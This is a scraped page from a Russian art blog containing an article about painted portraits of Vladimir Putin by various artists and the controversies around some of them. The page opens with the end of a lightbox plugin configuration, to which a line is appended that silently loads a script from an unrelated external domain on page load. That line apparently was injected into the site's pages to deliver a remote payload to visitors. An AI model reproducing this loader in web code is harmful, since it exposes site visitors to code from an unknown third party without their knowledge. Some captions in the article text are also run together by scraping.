, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портрет президента Путина

Автор: Дмитрий Алмазов | 08 Фев 2014

Портрет президента Путина художник Ларс Креммер.Портрет в изобразительном искусстве - это один из интереснейших жанров живописи, который отображает визуальные характеристики модели. На портрете изображается внешность реального человека.

Среди художников, работающих в направлении написания портретов президентов  можно отметить: Петербургского художника Алексея Сергиенко, который также является бизнесменом, написавшим 15 портретов президента России-Путина. Первым его творением стал портрет «Плачущий Путин». Картины художника можно было увидеть на выставке: «Президент. Добрейшей  души человек», которая проходила в портрет президента Москве в 2012 году. По словам самого Алексея, на написание картин его подвигло желание: привлечь внимание президента и государственных служащих к слову доброта, что возможно они станут добрее и жить будет лучше. Любая из этих картин должна вызывать улыбку и позитивный настрой и если улыбка и позитивный настрой передастся президенту, то эта космическая энергия от него вернется к народу. Своего президента уважать мы обязаны.

Портрет президента ПутинаВ классическом жанре портрета, Путина изобразил итальянский иллюстратор, художник, дизайнер и графитчик Эмануэле Ронко. Работает Эмануэле под псевдонимом Rems 182. Отличительной особенностью является изображение руки на лице человека, что придает оригинальность и чарующую атмосферу его работам.

Известный советский и российский художник, Никас Степанович Сафронов, тоже написал несколько портретов президента, самым необычным из них является портрет В.В.Путина в костюме времени Франциска, этот портрет из серии «Река времени».

Самым необычным автором портрета правителя написанном в классическом стиле портретной живописи стала матушка Фотиния, бывшая начальница торгово-закупочной базы, отсидевшая в 1990х годах срок за мошенничество, в настоящее время является главой религиозной общины.

Так же портрет Путина написал Датский художник Ларс Креммер. Портрет президента попал под цензуру, по причине того что лицо Владимира Владимировича залито горючими слезами. В Россию, где проводилась выставка «Плачущие идолы» картина во флуоресцентной стилистике поп-арта не попала.

Портрет президента художник Константин АлтунинЕще одно оскандаленное произведение искусства, написанное в жанре живопись сотрудники полиции, изъяли из Музея власти, в Санкт-Петербурге, непосредственно с выставки Константина Алтунина «Правители». На картине были изображены Владимир Путин и Дмитрий Медведев в женском нижнем белье. Что вызвало ажиотаж и как следствие, последовала бурная реакция со стороны властей.

В 2001 году, спустя год после избрания президентом Владимира Владимировича Путина, в СМИ появилась информация о начале тенденции к развитию культа личности. Эти доводы подкреплялись аргументами, такими как большой ассортимент портретов Путина в переходе станции метро «Парк культуры» в Москве. Также в газетах появилась информация о том, что портрет президента художник Никас Сафроновположительное мнение о Путине, скорее всего, обусловлено желанием народа сохранить чувство собственного достоинства и гордость.

Купить картину или заказать портрет Вы можете по телефону +7(960)134 46 27 (г. Воронеж) или отправить заявку через форму обратной связи на странице контакты

Темы: Критика, Портрет | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress